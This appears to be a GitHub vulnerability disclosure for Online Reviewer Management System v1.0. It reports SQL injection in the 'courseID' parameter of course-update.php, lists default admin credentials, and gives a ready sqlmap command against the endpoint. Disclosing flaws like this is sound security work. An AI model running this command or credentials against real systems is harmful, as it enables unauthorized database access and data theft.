Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Online Reviewer Management System v1.0 by janobe has SQL injection

BUG_Author: crazychen123

Accessing admin accounts: Username: admin / Password: admin

Vulnerability File: reviewer_0/admins/assessments/course/course-update.php

Parameter "courseID" (GET), exists SQL injection vulnerability

sqlmap command: sqlmap -u "ip/reviewer_0/admins/assessments/course/course-update.php?courseID=1"

sqlmap injection result

image